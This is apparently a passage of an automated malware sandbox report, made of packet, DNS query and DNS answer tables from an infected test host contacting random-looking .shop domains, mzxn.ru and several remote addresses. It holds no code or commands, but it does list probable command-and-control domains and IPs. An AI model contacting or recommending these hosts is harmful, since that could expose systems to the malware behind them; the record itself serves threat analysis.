Aug 19, 2024 09:29:20.479294062 CEST	443	49770	188.114.96.3	192.168.2.4
Aug 19, 2024 09:29:20.479552984 CEST	443	49770	188.114.96.3	192.168.2.4
Aug 19, 2024 09:29:20.479631901 CEST	49770	443	192.168.2.4	188.114.96.3
Aug 19, 2024 09:29:20.483633041 CEST	49770	443	192.168.2.4	188.114.96.3
Aug 19, 2024 09:29:20.483684063 CEST	443	49770	188.114.96.3	192.168.2.4
Aug 19, 2024 09:29:20.483712912 CEST	49770	443	192.168.2.4	188.114.96.3
Aug 19, 2024 09:29:20.483730078 CEST	443	49770	188.114.96.3	192.168.2.4
Aug 19, 2024 09:29:20.501249075 CEST	49771	443	192.168.2.4	23.197.127.21
Aug 19, 2024 09:29:20.501307011 CEST	443	49771	23.197.127.21	192.168.2.4
Aug 19, 2024 09:29:20.501378059 CEST	49771	443	192.168.2.4	23.197.127.21
Aug 19, 2024 09:29:20.501737118 CEST	49771	443	192.168.2.4	23.197.127.21
Aug 19, 2024 09:29:20.501746893 CEST	443	49771	23.197.127.21	192.168.2.4
Aug 19, 2024 09:29:21.147836924 CEST	443	49771	23.197.127.21	192.168.2.4
Aug 19, 2024 09:29:21.147923946 CEST	49771	443	192.168.2.4	23.197.127.21
Aug 19, 2024 09:29:21.154448986 CEST	49771	443	192.168.2.4	23.197.127.21
Aug 19, 2024 09:29:21.154458046 CEST	443	49771	23.197.127.21	192.168.2.4
Aug 19, 2024 09:29:21.154870987 CEST	443	49771	23.197.127.21	192.168.2.4
Aug 19, 2024 09:29:21.156418085 CEST	49771	443	192.168.2.4	23.197.127.21
Aug 19, 2024 09:29:21.196515083 CEST	443	49771	23.197.127.21	192.168.2.4
Aug 19, 2024 09:29:21.613687038 CEST	443	49771	23.197.127.21	192.168.2.4
Aug 19, 2024 09:29:21.613718033 CEST	443	49771	23.197.127.21	192.168.2.4
Aug 19, 2024 09:29:21.613797903 CEST	443	49771	23.197.127.21	192.168.2.4
Aug 19, 2024 09:29:21.613823891 CEST	49771	443	192.168.2.4	23.197.127.21
Aug 19, 2024 09:29:21.613853931 CEST	443	49771	23.197.127.21	192.168.2.4
Aug 19, 2024 09:29:21.613868952 CEST	49771	443	192.168.2.4	23.197.127.21
Aug 19, 2024 09:29:21.613894939 CEST	49771	443	192.168.2.4	23.197.127.21
Aug 19, 2024 09:29:21.696959972 CEST	443	49771	23.197.127.21	192.168.2.4
Aug 19, 2024 09:29:21.697029114 CEST	443	49771	23.197.127.21	192.168.2.4
Aug 19, 2024 09:29:21.697063923 CEST	49771	443	192.168.2.4	23.197.127.21
Aug 19, 2024 09:29:21.697082043 CEST	443	49771	23.197.127.21	192.168.2.4
Aug 19, 2024 09:29:21.697122097 CEST	49771	443	192.168.2.4	23.197.127.21
Aug 19, 2024 09:29:21.712155104 CEST	443	49771	23.197.127.21	192.168.2.4
Aug 19, 2024 09:29:21.712205887 CEST	443	49771	23.197.127.21	192.168.2.4
Aug 19, 2024 09:29:21.712232113 CEST	49771	443	192.168.2.4	23.197.127.21
Aug 19, 2024 09:29:21.712240934 CEST	443	49771	23.197.127.21	192.168.2.4
Aug 19, 2024 09:29:21.712275028 CEST	443	49771	23.197.127.21	192.168.2.4
Aug 19, 2024 09:29:21.712279081 CEST	49771	443	192.168.2.4	23.197.127.21
Aug 19, 2024 09:29:21.712318897 CEST	49771	443	192.168.2.4	23.197.127.21
Aug 19, 2024 09:29:21.717715025 CEST	49771	443	192.168.2.4	23.197.127.21
Aug 19, 2024 09:29:21.717732906 CEST	443	49771	23.197.127.21	192.168.2.4
Aug 19, 2024 09:29:21.717744112 CEST	49771	443	192.168.2.4	23.197.127.21
Aug 19, 2024 09:29:21.717749119 CEST	443	49771	23.197.127.21	192.168.2.4
Aug 19, 2024 09:29:21.749679089 CEST	49772	443	192.168.2.4	188.114.97.3
Aug 19, 2024 09:29:21.749739885 CEST	443	49772	188.114.97.3	192.168.2.4
Aug 19, 2024 09:29:21.749798059 CEST	49772	443	192.168.2.4	188.114.97.3
Aug 19, 2024 09:29:21.750149965 CEST	49772	443	192.168.2.4	188.114.97.3
Aug 19, 2024 09:29:21.750168085 CEST	443	49772	188.114.97.3	192.168.2.4
Aug 19, 2024 09:29:22.474431992 CEST	443	49772	188.114.97.3	192.168.2.4
Aug 19, 2024 09:29:22.474534035 CEST	49772	443	192.168.2.4	188.114.97.3
Aug 19, 2024 09:29:22.476205111 CEST	49772	443	192.168.2.4	188.114.97.3
Aug 19, 2024 09:29:22.476213932 CEST	443	49772	188.114.97.3	192.168.2.4
Aug 19, 2024 09:29:22.476627111 CEST	443	49772	188.114.97.3	192.168.2.4
Aug 19, 2024 09:29:22.477861881 CEST	49772	443	192.168.2.4	188.114.97.3
Aug 19, 2024 09:29:22.480942011 CEST	49772	443	192.168.2.4	188.114.97.3
Aug 19, 2024 09:29:22.481004000 CEST	443	49772	188.114.97.3	192.168.2.4
Aug 19, 2024 09:29:23.077563047 CEST	443	49772	188.114.97.3	192.168.2.4
Aug 19, 2024 09:29:23.077707052 CEST	443	49772	188.114.97.3	192.168.2.4
Aug 19, 2024 09:29:23.077764988 CEST	49772	443	192.168.2.4	188.114.97.3
Aug 19, 2024 09:29:23.109568119 CEST	49772	443	192.168.2.4	188.114.97.3
Aug 19, 2024 09:29:23.109586954 CEST	443	49772	188.114.97.3	192.168.2.4
Aug 19, 2024 09:29:23.109606028 CEST	49772	443	192.168.2.4	188.114.97.3
Aug 19, 2024 09:29:23.109611988 CEST	443	49772	188.114.97.3	192.168.2.4
Aug 19, 2024 09:29:59.536581039 CEST	49773	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:29:59.541553974 CEST	80	49773	189.163.89.217	192.168.2.4
Aug 19, 2024 09:29:59.541688919 CEST	49773	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:29:59.541838884 CEST	49773	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:29:59.541858912 CEST	49773	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:29:59.546698093 CEST	80	49773	189.163.89.217	192.168.2.4
Aug 19, 2024 09:29:59.546736002 CEST	80	49773	189.163.89.217	192.168.2.4
Aug 19, 2024 09:30:00.812921047 CEST	80	49773	189.163.89.217	192.168.2.4
Aug 19, 2024 09:30:00.813049078 CEST	80	49773	189.163.89.217	192.168.2.4
Aug 19, 2024 09:30:00.813062906 CEST	80	49773	189.163.89.217	192.168.2.4
Aug 19, 2024 09:30:00.813101053 CEST	49773	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:30:00.813148022 CEST	49773	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:30:00.813213110 CEST	49773	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:30:00.818243980 CEST	80	49773	189.163.89.217	192.168.2.4
Aug 19, 2024 09:30:06.235025883 CEST	49774	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:30:06.285537958 CEST	80	49774	189.163.89.217	192.168.2.4
Aug 19, 2024 09:30:06.285671949 CEST	49774	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:30:06.285881042 CEST	49774	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:30:06.285909891 CEST	49774	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:30:06.290724993 CEST	80	49774	189.163.89.217	192.168.2.4
Aug 19, 2024 09:30:06.290772915 CEST	80	49774	189.163.89.217	192.168.2.4
Aug 19, 2024 09:30:07.367075920 CEST	80	49774	189.163.89.217	192.168.2.4
Aug 19, 2024 09:30:07.367134094 CEST	80	49774	189.163.89.217	192.168.2.4
Aug 19, 2024 09:30:07.367373943 CEST	49774	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:30:07.367464066 CEST	49774	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:30:07.372294903 CEST	80	49774	189.163.89.217	192.168.2.4
Aug 19, 2024 09:30:12.066274881 CEST	49775	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:30:12.072833061 CEST	80	49775	189.163.89.217	192.168.2.4
Aug 19, 2024 09:30:12.072963953 CEST	49775	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:30:12.073133945 CEST	49775	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:30:12.073163986 CEST	49775	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:30:12.078186989 CEST	80	49775	189.163.89.217	192.168.2.4
Aug 19, 2024 09:30:12.078217983 CEST	80	49775	189.163.89.217	192.168.2.4
Aug 19, 2024 09:30:13.154412031 CEST	80	49775	189.163.89.217	192.168.2.4
Aug 19, 2024 09:30:13.154985905 CEST	80	49775	189.163.89.217	192.168.2.4
Aug 19, 2024 09:30:13.155090094 CEST	49775	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:30:13.155711889 CEST	49775	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:30:13.160603046 CEST	80	49775	189.163.89.217	192.168.2.4
Aug 19, 2024 09:30:17.934855938 CEST	49776	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:30:17.940560102 CEST	80	49776	189.163.89.217	192.168.2.4
Aug 19, 2024 09:30:17.940701008 CEST	49776	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:30:17.940922976 CEST	49776	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:30:17.940973043 CEST	49776	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:30:17.945811987 CEST	80	49776	189.163.89.217	192.168.2.4
Aug 19, 2024 09:30:17.945944071 CEST	80	49776	189.163.89.217	192.168.2.4
Aug 19, 2024 09:30:19.028424025 CEST	80	49776	189.163.89.217	192.168.2.4
Aug 19, 2024 09:30:19.028733015 CEST	80	49776	189.163.89.217	192.168.2.4
Aug 19, 2024 09:30:19.028847933 CEST	49776	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:30:19.041712999 CEST	49776	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:30:19.046711922 CEST	80	49776	189.163.89.217	192.168.2.4
Aug 19, 2024 09:30:25.012279034 CEST	49777	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:30:25.017498016 CEST	80	49777	189.163.89.217	192.168.2.4
Aug 19, 2024 09:30:25.017623901 CEST	49777	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:30:25.017790079 CEST	49777	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:30:25.017823935 CEST	49777	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:30:25.022576094 CEST	80	49777	189.163.89.217	192.168.2.4
Aug 19, 2024 09:30:25.022701025 CEST	80	49777	189.163.89.217	192.168.2.4
Aug 19, 2024 09:30:26.083509922 CEST	80	49777	189.163.89.217	192.168.2.4
Aug 19, 2024 09:30:26.084220886 CEST	80	49777	189.163.89.217	192.168.2.4
Aug 19, 2024 09:30:26.084291935 CEST	49777	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:30:26.084331036 CEST	49777	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:30:26.093216896 CEST	80	49777	189.163.89.217	192.168.2.4
Aug 19, 2024 09:30:31.503618002 CEST	49778	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:30:31.509100914 CEST	80	49778	189.163.89.217	192.168.2.4
Aug 19, 2024 09:30:31.509207010 CEST	49778	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:30:31.509370089 CEST	49778	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:30:31.509401083 CEST	49778	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:30:31.514238119 CEST	80	49778	189.163.89.217	192.168.2.4
Aug 19, 2024 09:30:31.514365911 CEST	80	49778	189.163.89.217	192.168.2.4
Aug 19, 2024 09:30:32.576231003 CEST	80	49778	189.163.89.217	192.168.2.4
Aug 19, 2024 09:30:32.577946901 CEST	80	49778	189.163.89.217	192.168.2.4
Aug 19, 2024 09:30:32.578026056 CEST	49778	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:30:32.578063965 CEST	49778	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:30:32.582845926 CEST	80	49778	189.163.89.217	192.168.2.4
Aug 19, 2024 09:30:43.058012962 CEST	61794	80	192.168.2.4	58.151.148.90
Aug 19, 2024 09:30:43.063492060 CEST	80	61794	58.151.148.90	192.168.2.4
Aug 19, 2024 09:30:43.063581944 CEST	61794	80	192.168.2.4	58.151.148.90
Aug 19, 2024 09:30:43.063760996 CEST	61794	80	192.168.2.4	58.151.148.90
Aug 19, 2024 09:30:43.063788891 CEST	61794	80	192.168.2.4	58.151.148.90
Aug 19, 2024 09:30:43.068650007 CEST	80	61794	58.151.148.90	192.168.2.4
Aug 19, 2024 09:30:43.068720102 CEST	80	61794	58.151.148.90	192.168.2.4
Aug 19, 2024 09:30:44.707561970 CEST	80	61794	58.151.148.90	192.168.2.4
Aug 19, 2024 09:30:44.707628965 CEST	80	61794	58.151.148.90	192.168.2.4
Aug 19, 2024 09:30:44.707685947 CEST	61794	80	192.168.2.4	58.151.148.90
Aug 19, 2024 09:30:44.707792997 CEST	61794	80	192.168.2.4	58.151.148.90
Aug 19, 2024 09:30:44.713002920 CEST	80	61794	58.151.148.90	192.168.2.4
Aug 19, 2024 09:30:49.546607971 CEST	61795	80	192.168.2.4	58.151.148.90
Aug 19, 2024 09:30:49.551837921 CEST	80	61795	58.151.148.90	192.168.2.4
Aug 19, 2024 09:30:49.551939964 CEST	61795	80	192.168.2.4	58.151.148.90
Aug 19, 2024 09:30:49.552100897 CEST	61795	80	192.168.2.4	58.151.148.90
Aug 19, 2024 09:30:49.552155972 CEST	61795	80	192.168.2.4	58.151.148.90
Aug 19, 2024 09:30:49.557092905 CEST	80	61795	58.151.148.90	192.168.2.4
Aug 19, 2024 09:30:49.557126999 CEST	80	61795	58.151.148.90	192.168.2.4
Aug 19, 2024 09:30:51.114315987 CEST	80	61795	58.151.148.90	192.168.2.4
Aug 19, 2024 09:30:51.114394903 CEST	80	61795	58.151.148.90	192.168.2.4
Aug 19, 2024 09:30:51.114459038 CEST	61795	80	192.168.2.4	58.151.148.90
Aug 19, 2024 09:30:51.114583015 CEST	61795	80	192.168.2.4	58.151.148.90
Aug 19, 2024 09:30:51.119365931 CEST	80	61795	58.151.148.90	192.168.2.4
Aug 19, 2024 09:30:56.370697021 CEST	61796	80	192.168.2.4	58.151.148.90
Aug 19, 2024 09:30:56.409449100 CEST	80	61796	58.151.148.90	192.168.2.4
Aug 19, 2024 09:30:56.409557104 CEST	61796	80	192.168.2.4	58.151.148.90
Aug 19, 2024 09:30:56.409737110 CEST	61796	80	192.168.2.4	58.151.148.90
Aug 19, 2024 09:30:56.409764051 CEST	61796	80	192.168.2.4	58.151.148.90
Aug 19, 2024 09:30:56.414622068 CEST	80	61796	58.151.148.90	192.168.2.4
Aug 19, 2024 09:30:56.414787054 CEST	80	61796	58.151.148.90	192.168.2.4
Aug 19, 2024 09:30:57.877599955 CEST	80	61796	58.151.148.90	192.168.2.4
Aug 19, 2024 09:30:57.877906084 CEST	80	61796	58.151.148.90	192.168.2.4
Aug 19, 2024 09:30:57.878034115 CEST	61796	80	192.168.2.4	58.151.148.90
Aug 19, 2024 09:30:57.879312038 CEST	61796	80	192.168.2.4	58.151.148.90
Aug 19, 2024 09:30:57.884124041 CEST	80	61796	58.151.148.90	192.168.2.4
Aug 19, 2024 09:31:02.358550072 CEST	61797	80	192.168.2.4	58.151.148.90
Aug 19, 2024 09:31:02.364295959 CEST	80	61797	58.151.148.90	192.168.2.4
Aug 19, 2024 09:31:02.364379883 CEST	61797	80	192.168.2.4	58.151.148.90
Aug 19, 2024 09:31:02.364511967 CEST	61797	80	192.168.2.4	58.151.148.90
Aug 19, 2024 09:31:02.364536047 CEST	61797	80	192.168.2.4	58.151.148.90
Aug 19, 2024 09:31:02.369407892 CEST	80	61797	58.151.148.90	192.168.2.4
Aug 19, 2024 09:31:02.370131016 CEST	80	61797	58.151.148.90	192.168.2.4
Aug 19, 2024 09:31:03.858622074 CEST	80	61797	58.151.148.90	192.168.2.4
Aug 19, 2024 09:31:03.858733892 CEST	80	61797	58.151.148.90	192.168.2.4
Aug 19, 2024 09:31:03.858807087 CEST	61797	80	192.168.2.4	58.151.148.90
Aug 19, 2024 09:31:03.859014034 CEST	61797	80	192.168.2.4	58.151.148.90
Aug 19, 2024 09:31:03.863806009 CEST	80	61797	58.151.148.90	192.168.2.4
Aug 19, 2024 09:31:09.137617111 CEST	61798	80	192.168.2.4	58.151.148.90
Aug 19, 2024 09:31:09.142729044 CEST	80	61798	58.151.148.90	192.168.2.4
Aug 19, 2024 09:31:09.142817974 CEST	61798	80	192.168.2.4	58.151.148.90
Aug 19, 2024 09:31:09.143001080 CEST	61798	80	192.168.2.4	58.151.148.90
Aug 19, 2024 09:31:09.143057108 CEST	61798	80	192.168.2.4	58.151.148.90
Aug 19, 2024 09:31:09.150556087 CEST	80	61798	58.151.148.90	192.168.2.4
Aug 19, 2024 09:31:09.150566101 CEST	80	61798	58.151.148.90	192.168.2.4
Aug 19, 2024 09:31:11.757477045 CEST	80	61798	58.151.148.90	192.168.2.4
Aug 19, 2024 09:31:11.757669926 CEST	80	61798	58.151.148.90	192.168.2.4
Aug 19, 2024 09:31:11.757757902 CEST	61798	80	192.168.2.4	58.151.148.90
Aug 19, 2024 09:31:11.757798910 CEST	61798	80	192.168.2.4	58.151.148.90
Aug 19, 2024 09:31:11.763735056 CEST	80	61798	58.151.148.90	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 19, 2024 09:27:43.893707991 CEST	51086	53	192.168.2.4	1.1.1.1
Aug 19, 2024 09:27:44.903635025 CEST	51086	53	192.168.2.4	1.1.1.1
Aug 19, 2024 09:27:45.933990955 CEST	51086	53	192.168.2.4	1.1.1.1
Aug 19, 2024 09:27:47.584956884 CEST	53	51086	1.1.1.1	192.168.2.4
Aug 19, 2024 09:27:47.584971905 CEST	53	51086	1.1.1.1	192.168.2.4
Aug 19, 2024 09:27:47.584984064 CEST	53	51086	1.1.1.1	192.168.2.4
Aug 19, 2024 09:28:09.064460993 CEST	49733	53	192.168.2.4	1.1.1.1
Aug 19, 2024 09:28:09.120906115 CEST	53	49733	1.1.1.1	192.168.2.4
Aug 19, 2024 09:28:22.111368895 CEST	58225	53	192.168.2.4	1.1.1.1
Aug 19, 2024 09:28:22.119040012 CEST	53	58225	1.1.1.1	192.168.2.4
Aug 19, 2024 09:28:31.109786987 CEST	61322	53	192.168.2.4	1.1.1.1
Aug 19, 2024 09:28:31.125905037 CEST	53	61322	1.1.1.1	192.168.2.4
Aug 19, 2024 09:28:43.041810989 CEST	50173	53	192.168.2.4	1.1.1.1
Aug 19, 2024 09:28:43.057543039 CEST	53	50173	1.1.1.1	192.168.2.4
Aug 19, 2024 09:29:11.970849991 CEST	50771	53	192.168.2.4	1.1.1.1
Aug 19, 2024 09:29:12.158976078 CEST	53	50771	1.1.1.1	192.168.2.4
Aug 19, 2024 09:29:13.542691946 CEST	64114	53	192.168.2.4	1.1.1.1
Aug 19, 2024 09:29:13.756225109 CEST	53	64114	1.1.1.1	192.168.2.4
Aug 19, 2024 09:29:13.767663956 CEST	63947	53	192.168.2.4	1.1.1.1
Aug 19, 2024 09:29:13.776614904 CEST	53	63947	1.1.1.1	192.168.2.4
Aug 19, 2024 09:29:14.718472958 CEST	50040	53	192.168.2.4	1.1.1.1
Aug 19, 2024 09:29:14.731965065 CEST	53	50040	1.1.1.1	192.168.2.4
Aug 19, 2024 09:29:16.998250961 CEST	60883	53	192.168.2.4	1.1.1.1
Aug 19, 2024 09:29:17.012471914 CEST	53	60883	1.1.1.1	192.168.2.4
Aug 19, 2024 09:29:17.019200087 CEST	60199	53	192.168.2.4	1.1.1.1
Aug 19, 2024 09:29:17.033858061 CEST	53	60199	1.1.1.1	192.168.2.4
Aug 19, 2024 09:29:18.037379980 CEST	63992	53	192.168.2.4	1.1.1.1
Aug 19, 2024 09:29:18.051042080 CEST	53	63992	1.1.1.1	192.168.2.4
Aug 19, 2024 09:29:19.223911047 CEST	64486	53	192.168.2.4	1.1.1.1
Aug 19, 2024 09:29:19.237502098 CEST	53	64486	1.1.1.1	192.168.2.4
Aug 19, 2024 09:29:20.491880894 CEST	50296	53	192.168.2.4	1.1.1.1
Aug 19, 2024 09:29:20.500097990 CEST	53	50296	1.1.1.1	192.168.2.4
Aug 19, 2024 09:29:21.725439072 CEST	63916	53	192.168.2.4	1.1.1.1
Aug 19, 2024 09:29:21.747329950 CEST	53	63916	1.1.1.1	192.168.2.4
Aug 19, 2024 09:30:38.269100904 CEST	62170	53	192.168.2.4	1.1.1.1
Aug 19, 2024 09:30:39.259284019 CEST	62170	53	192.168.2.4	1.1.1.1
Aug 19, 2024 09:30:39.266675949 CEST	53	62170	1.1.1.1	192.168.2.4
Aug 19, 2024 09:30:40.477627993 CEST	53	62170	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 19, 2024 09:27:43.893707991 CEST	192.168.2.4	1.1.1.1	0x7d8e	Standard query (0)	mzxn.ru	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:27:44.903635025 CEST	192.168.2.4	1.1.1.1	0x7d8e	Standard query (0)	mzxn.ru	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:27:45.933990955 CEST	192.168.2.4	1.1.1.1	0x7d8e	Standard query (0)	mzxn.ru	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:28:09.064460993 CEST	192.168.2.4	1.1.1.1	0x95eb	Standard query (0)	100xmargin.com	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:28:22.111368895 CEST	192.168.2.4	1.1.1.1	0x6ba2	Standard query (0)	mussangroup.com	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:28:31.109786987 CEST	192.168.2.4	1.1.1.1	0x3242	Standard query (0)	oytrtojfgh.asia	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:28:43.041810989 CEST	192.168.2.4	1.1.1.1	0xb2da	Standard query (0)	mundoparachicas.space	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:29:11.970849991 CEST	192.168.2.4	1.1.1.1	0x6494	Standard query (0)	bassizcellskz.shop	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:29:13.542691946 CEST	192.168.2.4	1.1.1.1	0x2381	Standard query (0)	celebratioopz.shop	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:29:13.767663956 CEST	192.168.2.4	1.1.1.1	0x626d	Standard query (0)	writerospzm.shop	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:29:14.718472958 CEST	192.168.2.4	1.1.1.1	0xa598	Standard query (0)	deallerospfosu.shop	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:29:16.998250961 CEST	192.168.2.4	1.1.1.1	0xbfe7	Standard query (0)	mennyudosirso.shop	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:29:17.019200087 CEST	192.168.2.4	1.1.1.1	0xcfc7	Standard query (0)	languagedscie.shop	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:29:18.037379980 CEST	192.168.2.4	1.1.1.1	0x7cdd	Standard query (0)	complaintsipzzx.shop	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:29:19.223911047 CEST	192.168.2.4	1.1.1.1	0xa207	Standard query (0)	quialitsuzoxm.shop	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:29:20.491880894 CEST	192.168.2.4	1.1.1.1	0xef7c	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:29:21.725439072 CEST	192.168.2.4	1.1.1.1	0xecf7	Standard query (0)	tenntysjuxmz.shop	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:30:38.269100904 CEST	192.168.2.4	1.1.1.1	0xc968	Standard query (0)	100xmargin.com	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:30:39.259284019 CEST	192.168.2.4	1.1.1.1	0xc968	Standard query (0)	100xmargin.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 19, 2024 09:27:47.584956884 CEST	1.1.1.1	192.168.2.4	0x7d8e	No error (0)	mzxn.ru		77.29.6.193	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:27:47.584956884 CEST	1.1.1.1	192.168.2.4	0x7d8e	No error (0)	mzxn.ru		211.40.39.251	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:27:47.584956884 CEST	1.1.1.1	192.168.2.4	0x7d8e	No error (0)	mzxn.ru		125.7.253.10	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:27:47.584956884 CEST	1.1.1.1	192.168.2.4	0x7d8e	No error (0)	mzxn.ru		212.112.110.243	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:27:47.584956884 CEST	1.1.1.1	192.168.2.4	0x7d8e	No error (0)	mzxn.ru		123.212.43.225	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:27:47.584956884 CEST	1.1.1.1	192.168.2.4	0x7d8e	No error (0)	mzxn.ru		92.36.226.66	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:27:47.584956884 CEST	1.1.1.1	192.168.2.4	0x7d8e	No error (0)	mzxn.ru		217.219.131.81	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:27:47.584956884 CEST	1.1.1.1	192.168.2.4	0x7d8e	No error (0)	mzxn.ru		189.163.163.13	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:27:47.584956884 CEST	1.1.1.1	192.168.2.4	0x7d8e	No error (0)	mzxn.ru		88.225.215.104	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:27:47.584956884 CEST	1.1.1.1	192.168.2.4	0x7d8e	No error (0)	mzxn.ru		187.211.53.230	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:27:47.584971905 CEST	1.1.1.1	192.168.2.4	0x7d8e	No error (0)	mzxn.ru		77.29.6.193	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:27:47.584971905 CEST	1.1.1.1	192.168.2.4	0x7d8e	No error (0)	mzxn.ru		211.40.39.251	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:27:47.584971905 CEST	1.1.1.1	192.168.2.4	0x7d8e	No error (0)	mzxn.ru		125.7.253.10	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:27:47.584971905 CEST	1.1.1.1	192.168.2.4	0x7d8e	No error (0)	mzxn.ru		212.112.110.243	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:27:47.584971905 CEST	1.1.1.1	192.168.2.4	0x7d8e	No error (0)	mzxn.ru		123.212.43.225	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:27:47.584971905 CEST	1.1.1.1	192.168.2.4	0x7d8e	No error (0)	mzxn.ru		92.36.226.66	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:27:47.584971905 CEST	1.1.1.1	192.168.2.4	0x7d8e	No error (0)	mzxn.ru		217.219.131.81	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:27:47.584971905 CEST	1.1.1.1	192.168.2.4	0x7d8e	No error (0)	mzxn.ru		189.163.163.13	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:27:47.584971905 CEST	1.1.1.1	192.168.2.4	0x7d8e	No error (0)	mzxn.ru		88.225.215.104	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:27:47.584971905 CEST	1.1.1.1	192.168.2.4	0x7d8e	No error (0)	mzxn.ru		187.211.53.230	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:27:47.584984064 CEST	1.1.1.1	192.168.2.4	0x7d8e	No error (0)	mzxn.ru		77.29.6.193	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:27:47.584984064 CEST	1.1.1.1	192.168.2.4	0x7d8e	No error (0)	mzxn.ru		211.40.39.251	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:27:47.584984064 CEST	1.1.1.1	192.168.2.4	0x7d8e	No error (0)	mzxn.ru		125.7.253.10	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:27:47.584984064 CEST	1.1.1.1	192.168.2.4	0x7d8e	No error (0)	mzxn.ru		212.112.110.243	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:27:47.584984064 CEST	1.1.1.1	192.168.2.4	0x7d8e	No error (0)	mzxn.ru		123.212.43.225	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:27:47.584984064 CEST	1.1.1.1	192.168.2.4	0x7d8e	No error (0)	mzxn.ru		92.36.226.66	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:27:47.584984064 CEST	1.1.1.1	192.168.2.4	0x7d8e	No error (0)	mzxn.ru		217.219.131.81	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:27:47.584984064 CEST	1.1.1.1	192.168.2.4	0x7d8e	No error (0)	mzxn.ru		189.163.163.13	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:27:47.584984064 CEST	1.1.1.1	192.168.2.4	0x7d8e	No error (0)	mzxn.ru		88.225.215.104	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:27:47.584984064 CEST	1.1.1.1	192.168.2.4	0x7d8e	No error (0)	mzxn.ru		187.211.53.230	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:28:09.120906115 CEST	1.1.1.1	192.168.2.4	0x95eb	No error (0)	100xmargin.com		189.163.89.217	A (IP address)	IN (0x0001)	false
